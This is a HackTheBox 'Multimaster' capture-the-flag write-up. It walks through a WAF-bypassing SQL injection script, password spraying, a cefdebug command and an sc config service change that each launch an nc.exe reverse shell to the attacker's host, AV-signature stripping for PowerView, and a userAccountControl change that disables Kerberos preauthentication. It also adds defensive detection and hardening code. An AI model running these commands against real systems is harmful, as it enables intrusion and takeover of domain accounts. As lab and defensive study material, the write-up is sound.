HackTheBox - Multimaster


Foothold

Webserver with /api/getColleagues

SQL Injection with a WAF Bypass

User

Simple Data Exfil

http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/

Union-based injection to exfiltrate data.

Escaping every character of the payload as a JSON unicode escape (\uXXXX) gets it past the WAF: the filter matches on the raw request body, while the application's JSON parser decodes the escapes before the value reaches the query. Enumerate the database -> find the table Logins with usernames and hashes.

  • crack hashes and save passwords for later
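An added example (my code, not part of the writeup or of the box's MultimasterAPI) showing why the \uXXXX trick works and what closes it: a filter that matches on the raw body misses the escaped payload, a filter that decodes the JSON first sees it, and a parameterised query makes the filter unnecessary. The endpoint name and the MSSQL payload are the writeup's; the request bodies, the SQLite stand-in table and the SQLite-flavoured payload are constructed for the demo.

```python
import json
import re
import sqlite3

# Patterns a request filter might look for. They are deliberately simple;
# the point is where in the pipeline they are applied, not how good they are.
SQLI_PATTERN = re.compile(r"(union\s+all\s+select|union\s+select|'\s*or\s+1\s*=\s*1|--\s*$)",
                          re.IGNORECASE | re.MULTILINE)


def naive_waf_blocks(raw_body: str) -> bool:
    """Inspect the raw request body before it is JSON-decoded (the weak setting)."""
    return bool(SQLI_PATTERN.search(raw_body))


def _strings(node):
    """Yield every string value in a decoded JSON document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for value in node.values():
            yield from _strings(value)
    elif isinstance(node, list):
        for value in node:
            yield from _strings(value)


def normalized_waf_blocks(raw_body: str) -> bool:
    """Decode the JSON first, so \\uXXXX escapes collapse into the characters the
    application will actually hand to the database, then inspect the values."""
    try:
        doc = json.loads(raw_body)
    except ValueError:
        return True  # malformed JSON: reject rather than pass it through unchecked
    return any(SQLI_PATTERN.search(value) for value in _strings(doc))


def json_escape_every_char(text: str) -> str:
    """Write every character as a JSON \\uXXXX escape (the form the writeup's helper produces)."""
    return "".join("\\u%04x" % ord(ch) for ch in text)


def build_body(name: str, escape: bool = False) -> str:
    """Constructed request body for /api/getColleagues (the endpoint name is from the writeup)."""
    value = json_escape_every_char(name) if escape else json.dumps(name)[1:-1]
    return '{"name":"%s"}' % value


# The MSSQL payload from the writeup, used only to exercise the two filters above.
INJECTION = "-1' UNION ALL SELECT 1,2,3,4,DEFAULT_DOMAIN(); --"


# --- The real fix: keep user input out of the SQL text entirely -------------
# An in-memory SQLite table stands in for the MSSQL backend; the payload below is
# adjusted to SQLite (three columns, sqlite_version() instead of DEFAULT_DOMAIN()).
SQLITE_INJECTION = "-1' UNION ALL SELECT 1,2,sqlite_version() --"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE colleagues(id INTEGER, name TEXT, position TEXT)")
    conn.executemany("INSERT INTO colleagues VALUES (?, ?, ?)",
                     [(1, "alice", "developer"), (2, "bob", "finance")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """String concatenation: the value becomes part of the SQL statement."""
    query = "SELECT id, name, position FROM colleagues WHERE name LIKE '%s'" % name
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    """Parameterised query: the value is bound as data and cannot alter the statement."""
    return conn.execute("SELECT id, name, position FROM colleagues WHERE name LIKE ?",
                        (name,)).fetchall()


if __name__ == "__main__":
    escaped = build_body(INJECTION, escape=True)
    print("raw-body filter blocks escaped payload:", naive_waf_blocks(escaped))
    print("decode-first filter blocks escaped payload:", normalized_waf_blocks(escaped))
    db = make_db()
    print("concatenated query returns:", lookup_vulnerable(db, SQLITE_INJECTION))
    print("parameterised query returns:", lookup_safe(db, SQLITE_INJECTION))
```

Normalising before inspection is the minimum a WAF needs to do for JSON bodies (the same applies to URL encoding and HTML entities); the parameterised lookup is what the application itself should have used.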

Cracking the hashes

Enumerate Domain Users via RID

#!/bin/bash
# Assumes charunicodeescape.py (not reproduced on this page) rewrites every
# character of the payload as a JSON \uXXXX escape, which is what gets the
# SQL past the WAF.

function get_output {
  out=$(curl -X POST http://10.10.10.179/api/getColleagues -d "{\"name\":\"${1}\"}" -H "Content-Type: application/json" -s)
  # the injected column comes back as the 18th double-quote-delimited field of the JSON response;
  # $out and $resp are left unquoted on purpose so that word splitting trims the
  # trailing spaces CONVERT(char(100),...) pads its result with
  resp=$(echo $out | cut -d '"' -f18)
  echo $resp
}

# TODO more enum scripts (left unimplemented; bash requires a function body, so ':' keeps the script valid)

# TODO
function dump_tables {
  :
}

# TODO
function dump_hashes {
  :
}

function find_domain {
  payload="-1' UNION ALL SELECT 1,2,3,4,DEFAULT_DOMAIN(); --"
  enc_payload=$(python charunicodeescape.py "$payload")
  get_output "$enc_payload"
}

# Enumerates MSSQL users by principal ID
function find_by_id {
  for id in {1..300}; do
    payload="-1' UNION ALL SELECT 1,2,3,4,SUSER_NAME($id); --"
    enc_payload=$(python charunicodeescape.py "$payload")
    resp=$(get_output "$enc_payload")
    [ -n "$resp" ] && echo "ID=$id USER=$resp"
    sleep 2
  done
}

# Returns the SID of 'Domain Users' as a hex string (0x0105000000000005...);
# the last 4 bytes are the RID (513), everything before them is the domain SID prefix
function get_sid {
  payload="-1' UNION ALL SELECT 1,2,3,4,CONVERT(char(100),SUSER_SID('MEGACORP\Domain Users'),1); --"
  enc_payload=$(python charunicodeescape.py "$payload")
  get_output "$enc_payload"
}

# Enumerates domain users by SID: domain prefix + candidate RID
function find_by_sid {
  sid=$(get_sid | head -c-9)   # drop the trailing newline and the 8 hex digits of the RID
  for x in {500..1500}; do
    v=$(printf "%08x\n" $x | tr a-z A-Z) # RID as hex, zero-padded to 8 digits (4 bytes)
    hex=${v:6:2}${v:4:2}${v:2:2}${v:0:2} # byte-swap to little endian, as stored in the SID
    payload="-1' UNION ALL SELECT 1,2,3,4,SUSER_SNAME($sid$hex); --"
    enc_payload=$(python charunicodeescape.py "$payload")
    user=$(get_output "$enc_payload")
    [ -n "$user" ] && echo "ID=$hex USER=$user"
    sleep 2
  done
}

echo "######## MSSQL Domain Enumeration ########"
echo ""
echo "Domain: $(find_domain)"
#find_by_id
#get_sid
find_by_sid

Password Spraying

Brute-force logins over SMB with the users found above and the previously cracked passwords.

login with evil-winrm

tushikikatomo -> cyork

netstat -a                  # identify ports listening on 127.0.0.1
ps | Select-String "Code"   # find the process behind them

VSCode is being started at intervals; the listening ports change and are only open while VSCode is running. They belong to the Electron CEF debugger (a NodeJS inspector endpoint).

https://github.com/taviso/cefdebug

We can abuse that debugger with the cefdebug tool:

cefdebug.exe # identify correct url
cefdebug.exe --code "process.mainModule.require('child_process').exec('C:\\windows\\system32\\spool\\drivers\\color\\nc.exe -e cmd.exe 10.10.14.17 1338')" --url ws://127.0.0.1/{<some-uuid>}

cyork -> sbauer

net user cyork

-> cyork is a member of the Developers group, so we can read the C:\inetpub\wwwroot directory; inside it we find MultimasterAPI.dll and MultimasterAPI.pdb.

The DLL decompiles easily with dnSpy or similar tools.

Inside we find credentials for the MSSQL user finder.

Password Spraying (again)

Another brute-force attack with this password against all domain users (patator smb_login).

We can log in as sbauer, who is also a member of Remote Management -> evil-winrm.
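Both spraying rounds above leave the same trace on the domain controller: many distinct accounts failing from one source in a short time, then a success. An added example, not from the writeup, that finds that pattern in constructed 4625/4624 records (the source address is the attacker IP used in the writeup; the accounts and timestamps are made up):

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log extract: timestamp|EventID|TargetUserName|IpAddress.
# 4625 = failed logon, 4624 = successful logon. Source 10.10.14.17 tries one
# password against many accounts; 10.10.10.5 is a user mistyping their own
# password twice, which must not trigger.
SAMPLE_LOG = """\
2020-03-01T10:00:00|4625|alice|10.10.14.17
2020-03-01T10:00:05|4625|bob|10.10.14.17
2020-03-01T10:00:10|4625|carol|10.10.14.17
2020-03-01T10:00:15|4625|dave|10.10.14.17
2020-03-01T10:00:20|4625|erin|10.10.14.17
2020-03-01T10:00:25|4625|frank|10.10.14.17
2020-03-01T10:00:30|4624|cyork|10.10.14.17
2020-03-01T10:03:00|4625|grace|10.10.10.5
2020-03-01T10:03:10|4625|grace|10.10.10.5
2020-03-01T10:03:20|4624|grace|10.10.10.5
""".splitlines()

WINDOW = timedelta(minutes=5)   # how far apart failures may be and still count together
THRESHOLD = 5                   # distinct accounts failing from one source inside WINDOW


def parse(line: str):
    ts, event_id, user, src = line.split("|")
    return datetime.fromisoformat(ts), int(event_id), user, src


def detect_spray(lines, window=WINDOW, threshold=THRESHOLD) -> dict:
    """Return {source_ip: max_distinct_accounts} for sources that look like a spray.
    A spray is many *different* accounts failing from one source in a short window;
    one user failing repeatedly (a brute force or a typo) does not match."""
    events = sorted(parse(line) for line in lines)
    failures = defaultdict(list)
    for ts, event_id, user, src in events:
        if event_id == 4625:
            failures[src].append((ts, user))
    alerts = {}
    for src, fails in failures.items():
        start = 0
        for end in range(len(fails)):            # sliding window over this source's failures
            while fails[end][0] - fails[start][0] > window:
                start += 1
            distinct = {user for _, user in fails[start:end + 1]}
            if len(distinct) >= threshold:
                alerts[src] = max(len(distinct), alerts.get(src, 0))
    return alerts


def compromised_accounts(lines, alerts: dict) -> set:
    """Accounts that logged on successfully from a flagged source after its spray began."""
    first_failure = {}
    hits = set()
    for ts, event_id, user, src in sorted(parse(line) for line in lines):
        if src not in alerts:
            continue
        if event_id == 4625:
            first_failure.setdefault(src, ts)
        elif event_id == 4624 and src in first_failure:
            hits.add(user)
    return hits


if __name__ == "__main__":
    found = detect_spray(SAMPLE_LOG)
    print("spraying sources:", found)
    print("accounts to reset:", compromised_accounts(SAMPLE_LOG, found))
```

The distinct-account count is what separates a spray from a lockout-prone brute force, which is also why sprays stay under the lockout threshold: one or two guesses per account look like ordinary typos unless you group by source.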

sbauer -> jorden

run sharphound

-> GenericWrite privileges on jorden
-> use PowerView.ps1 to abuse them in the following way:
   # Command to get rid of comments and possible AV signatures before uploading PowerView:
   # sed '/<#/,/#>/d' powerview.ps1 > new_powerview.ps1
   # Credit: https://implicitdeny.org/2016/03/powerview-caught-by-sep/
*Evil-WinRM* PS C:\Users\sbauer\Documents> Set-DomainObject -Identity jorden -XOR @{useraccountcontrol=4194304} -Verbose
Verbose: [Get-DomainSearcher] search base: LDAP://DC=MEGACORP,DC=LOCAL
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=jorden)(name=jorden)(displayname=jorden))))
Verbose: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'jorden'
*Evil-WinRM* PS C:\Users\sbauer\Documents> Get-DomainUser jorden | ConvertFrom-UACValue

Name                           Value
----                           -----
NORMAL_ACCOUNT                 512
DONT_EXPIRE_PASSWORD           65536
DONT_REQ_PREAUTH               4194304
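The XOR above flips a single bit in userAccountControl. As an added example (not from the writeup or from PowerView), a decoder for that attribute that reproduces the ConvertFrom-UACValue output, shows the XOR in both directions, and flags accounts whose flags weaken authentication; the directory snapshot is constructed, with jorden's value taken from the output above.

```python
# userAccountControl bit names as Microsoft defines them (ADS_USER_FLAG_ENUM).
UAC_FLAGS = {
    0x00000001: "SCRIPT",
    0x00000002: "ACCOUNTDISABLE",
    0x00000008: "HOMEDIR_REQUIRED",
    0x00000010: "LOCKOUT",
    0x00000020: "PASSWD_NOTREQD",
    0x00000040: "PASSWD_CANT_CHANGE",
    0x00000080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x00000100: "TEMP_DUPLICATE_ACCOUNT",
    0x00000200: "NORMAL_ACCOUNT",
    0x00000800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x00001000: "WORKSTATION_TRUST_ACCOUNT",
    0x00002000: "SERVER_TRUST_ACCOUNT",
    0x00010000: "DONT_EXPIRE_PASSWORD",
    0x00020000: "MNS_LOGON_ACCOUNT",
    0x00040000: "SMARTCARD_REQUIRED",
    0x00080000: "TRUSTED_FOR_DELEGATION",
    0x00100000: "NOT_DELEGATED",
    0x00200000: "USE_DES_KEY_ONLY",
    0x00400000: "DONT_REQ_PREAUTH",
    0x00800000: "PASSWORD_EXPIRED",
    0x01000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x04000000: "PARTIAL_SECRETS_ACCOUNT",
}

# Flags that weaken an account's authentication and deserve a review whenever set.
RISKY_FLAGS = {"DONT_REQ_PREAUTH", "PASSWD_NOTREQD", "USE_DES_KEY_ONLY",
               "TRUSTED_FOR_DELEGATION", "ENCRYPTED_TEXT_PWD_ALLOWED"}


def decode_uac(value: int) -> list:
    """Same output as PowerView's ConvertFrom-UACValue, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def encode_uac(*names: str) -> int:
    by_name = {name: bit for bit, name in UAC_FLAGS.items()}
    return sum(by_name[n] for n in names)


def xor_uac(value: int, mask: int) -> int:
    """What Set-DomainObject -XOR does: toggle the bits in mask. Applying the
    same mask a second time restores the original value, which is also the cleanup."""
    return value ^ mask


def audit(accounts: dict) -> dict:
    """Map sAMAccountName -> risky flags for every account that carries any."""
    findings = {}
    for sam, value in accounts.items():
        risky = [flag for flag in decode_uac(value) if flag in RISKY_FLAGS]
        if risky:
            findings[sam] = risky
    return findings


# Constructed directory snapshot; jorden's value is the one shown above after the
# XOR (512 + 65536 + 4194304). svc_legacy is a made-up account with other weak flags.
DIRECTORY = {
    "sbauer": encode_uac("NORMAL_ACCOUNT"),
    "jorden": 4260352,
    "svc_legacy": encode_uac("NORMAL_ACCOUNT", "PASSWD_NOTREQD", "USE_DES_KEY_ONLY"),
}


if __name__ == "__main__":
    print("jorden:", decode_uac(DIRECTORY["jorden"]))
    print("after clearing the bit:", decode_uac(xor_uac(DIRECTORY["jorden"], 0x400000)))
    print("audit findings:", audit(DIRECTORY))
```

Running the audit over a periodic LDAP export of userAccountControl catches this change regardless of who made it; Event ID 4738 (user account changed) on the domain controller records the write itself together with the caller.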

Privesc to System

jorden is a member of the Server Operators group.

Server Operators may modify, start and stop services, so look for services that run in the context of LocalSystem:

reg query HKLM\System\CurrentControlSet\Services /f LocalSystem /t REG_SZ /s

pick one and hope for the best

*Evil-WinRM* PS C:\Users\jorden\Documents> cmd /c sc config wisvc binpath= "%SystemRoot%\system32\spool\drivers\color\nc.exe -e cmd.exe 10.10.14.17 1338"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\jorden\Documents> cmd /c sc start wiSvc
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

*Evil-WinRM* PS C:\Users\jorden\Documents>

PROFIT!!! The 1053 error is expected: nc.exe never reports back to the Service Control Manager, so the start is declared failed, but the process has already been launched as LocalSystem and the reverse shell has connected.
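The sc config call above rewrites the service's ImagePath value under HKLM\System\CurrentControlSet\Services, which Sysmon records as Event ID 13 (registry value set). An added example, not from the writeup, that scores such records on where the binary lives and what arguments it carries; the records are constructed here to mirror the change above, and the rules are mine.

```python
import re

# Constructed records shaped like Sysmon Event ID 13 (RegistryEvent: value set).
# Record 0 mirrors the "sc config wisvc binpath=" change from the writeup; the
# others are ordinary service configuration.
SAMPLE_EVENTS = [
    {"EventID": 13, "User": r"MEGACORP\jorden",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\wisvc\ImagePath",
     "Details": r"%SystemRoot%\system32\spool\drivers\color\nc.exe -e cmd.exe 10.10.14.17 1338"},
    {"EventID": 13, "User": r"NT AUTHORITY\SYSTEM",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\wisvc\ImagePath",
     "Details": r"%SystemRoot%\system32\svchost.exe -k netsvcs -p"},
    {"EventID": 13, "User": r"MEGACORP\jorden",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\wisvc\Start",
     "Details": "DWORD (0x00000003)"},
]

SERVICE_IMAGEPATH = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)
# Directories a standard user can normally write to. spool\drivers\color is the one
# the writeup uses; it is writable by authenticated users on default installs.
WRITABLE_DIRS = re.compile(
    r"(spool\\drivers\\color|\\users\\|\\temp\\|\\programdata\\|\\appdata\\)", re.IGNORECASE)
# Command lines that look like a shell rather than a service host.
SHELL_ARGS = re.compile(
    r"(\bnc(64)?\.exe\b|-e\s+cmd(\.exe)?\b|powershell[^|]*-e(nc|ncodedcommand)\b)", re.IGNORECASE)
# The executable sits directly in System32 (svchost.exe does) or under Program Files.
TRUSTED_LOCATION = re.compile(
    r"^(?:(?:%systemroot%|c:\\windows)\\system32\\[^\\]+\.exe"
    r"|(?:%programfiles%|c:\\program files(?: \(x86\))?)\\)", re.IGNORECASE)


def evaluate(record: dict):
    """Return (service, user, reasons) for a suspicious ImagePath change, else None."""
    match = SERVICE_IMAGEPATH.match(record.get("TargetObject", ""))
    if record.get("EventID") != 13 or not match:
        return None
    service = match.group(1)
    value = record["Details"].replace('"', "").strip()   # strip quoting around paths
    reasons = []
    if WRITABLE_DIRS.search(value):
        reasons.append("binary in user-writable directory")
    if SHELL_ARGS.search(value):
        reasons.append("reverse-shell style arguments")
    if not TRUSTED_LOCATION.match(value):
        reasons.append("binary outside System32 or Program Files")
    return (service, record.get("User"), reasons) if reasons else None


def scan(records: list) -> list:
    """Apply evaluate() to a batch of records and keep only the alerts."""
    return [alert for alert in map(evaluate, records) if alert]


if __name__ == "__main__":
    for service, user, reasons in scan(SAMPLE_EVENTS):
        print(f"{service} changed by {user}: {', '.join(reasons)}")
```

The writable-directory and shell-argument rules are the strong signals; the location rule is a weak one that third-party services will trip, so treat it as a score contribution rather than an alert on its own. The same ImagePath value is also visible in System log Event ID 7040 when a service configuration changes, for hosts without Sysmon.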

Shell as NT Authority/System

gg